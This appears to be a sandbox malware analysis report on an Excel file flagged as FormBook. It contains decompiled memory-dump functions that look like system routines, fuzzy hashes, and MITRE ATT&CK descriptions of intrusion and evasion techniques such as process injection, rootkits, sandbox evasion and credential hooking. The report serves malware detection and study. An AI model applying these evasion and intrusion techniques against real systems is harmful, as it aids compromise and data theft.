0x021b22b4
0x021b22b4
0x021b22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x021b22b6
0x021b228f
0x00000000
0x021b226d
0x021753cb
0x021753ce
0x021753d0
0x021753d4
0x021753d6
0x00000000
0x021753d8
0x021753e3
0x021753ea
0x021753ea
0x021753d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021B22F4

Strings

RTL: Resource at %p, xrefs: 021B230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021B22FC
RTL: Re-Waiting, xrefs: 021B2328

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 4a73f6a8f892851c76cf933c3a1cb7823a52a414b7c57536e6b358c7e957c4f4
Instruction ID: 52beb44321104c603b22f7cd3091d8cd2bf772bcbc721c10e5087bf25f56b1ca
Opcode Fuzzy Hash: 4a73f6a8f892851c76cf933c3a1cb7823a52a414b7c57536e6b358c7e957c4f4
Instruction Fuzzy Hash: 2551F8716806016FEF15DF68CC80FA773AAEF88324F104659FD19DB250EB71E8458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0217EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0217EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0216DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x223793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E021516C0(_t39);
				} else {
					_t40 = E0214F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02193915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E021501A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x223793c; // 0x0
								_push(_t85);
								_t44 = E02151F28(_t71);
							} else {
								_t44 = E0214F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02193915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E021D2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0217EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02194FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E021A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E021A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x22320c0;
								if(_t85 != 0x22320c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E021D217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E021A3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0217ec56
0x0217ec56
0x0217ec56
0x0217ec5c
0x0217ec64
0x021b23e6
0x021b23eb
0x021b23eb
0x0217ec6a
0x0217ec6c
0x0217ec6f
0x021b23f3
0x021b23f8
0x021b23fa
0x021b23fc
0x0217ec75
0x0217ec76
0x0217ec76
0x0217ec7b
0x0217ec7c
0x0217ec7e
0x021b2406
0x021b2407
0x021b240c
0x021b240d
0x021b240d
0x021b240d
0x021b2414
0x021b2417
0x021b241e
0x021b2435
0x021b2438
0x021b243c
0x021b243f
0x021b2442
0x021b2443
0x021b2446
0x021b2449
0x021b2453
0x021b2455
0x021b245b
0x021b245b
0x0217eb99
0x0217eb99
0x0217eb9c
0x0217eb9d
0x0217eb9f
0x0217eba2
0x021b2465
0x021b246b
0x021b246d
0x0217eba8
0x0217eba9
0x0217eba9
0x0217ebae
0x0217ebb3
0x0217ebb9
0x0217ebbb
0x021b2513
0x021b2514
0x021b2519
0x021b251b
0x0217ec2a
0x0217ec2d
0x0217ec33
0x0217ec36
0x0217ec3a
0x0217ec3e
0x0217ec40
0x0217ec47
0x0217ec47
0x0217ec40
0x021522c6
0x0217ebc1
0x0217ebc1
0x0217ebc5
0x0217ec9a
0x0217ec9a
0x0217ebd6
0x0217ebd6
0x00000000
0x0217ebbb
0x021b2477
0x021b247c
0x021b2486
0x021b248b
0x021b2496
0x021b249b
0x021b249d
0x021b24a0
0x021b24a3
0x021b24aa
0x021b24aa
0x021b24a5
0x021b24a5
0x021b24a5
0x021b24ac
0x021b24af
0x021b24b0
0x021b24b3
0x021b24b9
0x021b24ba
0x021b24bb
0x021b24c6
0x021b24cb
0x021b24cd
0x021b24d0
0x021b24d1
0x021b24d4
0x021b24d6
0x021b24d9
0x021b24d9
0x021b24dc
0x021b24df
0x021b24e1
0x021b24e7
0x021b24e9
0x021b24ec
0x021b24ef
0x021b24f2
0x021b24f2
0x021b24ef
0x021b24e7
0x021b24fa
0x021b24ff
0x021b2501
0x021b2503
0x021b2506
0x021b250b
0x0217eb8c
0x0217eb93
0x00000000
0x00000000
0x0217eb93
0x00000000
0x0217eb99
0x0217ec85
0x0217ec85
0x0217ec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 021B248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021B24BD
RTL: Re-Waiting, xrefs: 021B24FA

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 478901967d33c73b773c6eb65d44f814595952426e095edb0ad6c7a2f795fc22
Instruction ID: b6cd40364b282adde127e4772e6fdd6babaea8b6b23f8b2532869dd500ba228a
Opcode Fuzzy Hash: 478901967d33c73b773c6eb65d44f814595952426e095edb0ad6c7a2f795fc22
Instruction Fuzzy Hash: 4F41F870680204AFDB24DF68DC89FAA77F9AF88320F108645F9699B2C0D734E945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0218FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0218FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0218EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0218EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0218685D(_t167, 4) == 0) {
								if(E0218685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0218685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0218685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02168980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0215DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0218EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0218EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0218fcd1
0x0218fcd6
0x0218fcd9
0x0218fcdc
0x0218fcdf
0x0218fce2
0x0218fce5
0x0218fce8
0x0218fceb
0x0218fced
0x0218fced
0x0218fcf3
0x00000000
0x00000000
0x0218fcfc
0x0218fcfe
0x0218fdc1
0x021becbd
0x00000000
0x021beccc
0x021beccc
0x021becd2
0x00000000
0x00000000
0x021becdf
0x021bece0
0x021bece4
0x021beceb
0x021becee
0x021beca8
0x021beca8
0x021becaa
0x0218fd76
0x0218fd79
0x0218fdb4
0x0218fdb5
0x0218fdb6
0x00000000
0x0218fdb6
0x0218fd7e
0x021becfc
0x0218fe2f
0x00000000
0x0218fe2f
0x021bed08
0x021bed0f
0x021bed17
0x021bed1b
0x00000000
0x021bed1b
0x0218fd88
0x00000000
0x00000000
0x0218fd94
0x0218fd99
0x0218fda1
0x00000000
0x00000000
0x0218fdb0
0x00000000
0x0218fdb0
0x021becbd
0x0218fdc7
0x0218fdcb
0x00000000
0x0218fdd7
0x0218fde3
0x0218fe06
0x021a1fe7
0x00000000
0x00000000
0x021a1fef
0x021a1ff0
0x021a1ff4
0x021a1ff7
0x021a1ffa
0x021a1ffd
0x021a2000
0x00000000
0x00000000
0x021becf1
0x00000000
0x021becf1
0x00000000
0x0218fe06
0x0218fde8
0x0218fdec
0x0218fdef
0x0218fdf2
0x00000000
0x0218fdf2
0x0218fdcb
0x0218fd04
0x0218fd05
0x021bec67
0x00000000
0x00000000
0x021bec6f
0x00000000
0x021bec6f
0x0218fd13
0x0218fd3c
0x0218fd40
0x021bec75
0x021bec7a
0x00000000
0x021bec8a
0x021bec8a
0x021bec90
0x021becb2
0x0218fd73
0x0218fd73
0x00000000
0x0218fd73
0x021bec95
0x00000000
0x00000000
0x021beca1
0x021beca4
0x021beca5
0x00000000
0x021beca5
0x021bec7a
0x0218fd4a
0x00000000
0x0218fd6e
0x0218fd6e
0x0218fd71
0x00000000
0x0218fd71
0x0218fd4a
0x0218fd21
0x0219a3a1
0x00000000
0x0219a3a1
0x0218fd36
0x021a200b
0x021a2012
0x00000000
0x00000000
0x021a2018
0x00000000
0x021a2018
0x00000000
0x0218fd36
0x0218fe0f
0x0218fe16
0x0219a3ad
0x00000000
0x00000000
0x0219a3b3
0x0219a3b3
0x0218fe1f
0x021bed25
0x021bed86
0x00000000
0x00000000
0x021bed91
0x021bed95
0x021bed95
0x021bed9a
0x021bedad
0x021bedb3
0x021bedba
0x021bedc4
0x021bedc9
0x00000000
0x021bedcc
0x021bed2a
0x021bed55
0x00000000
0x00000000
0x021bed61
0x021bed66
0x021bed6e
0x00000000
0x00000000
0x021bed7d
0x00000000
0x021bed7d
0x021bed30
0x00000000
0x00000000
0x021bed3c
0x021bed43
0x021bed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0218FD94

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: dd4446aa87c993bc949b8e418e16e57bacec64a1b99531cdce0d9fd69e5d106c
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 0C91A032D8024AEEDF24EF58C8847EEB7B4FF85309FA5806AD415E6551E7314A42CF91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MT OCEAN STAR ISO 8217 2005.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MT OCEAN STAR ISO 8217 2005.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

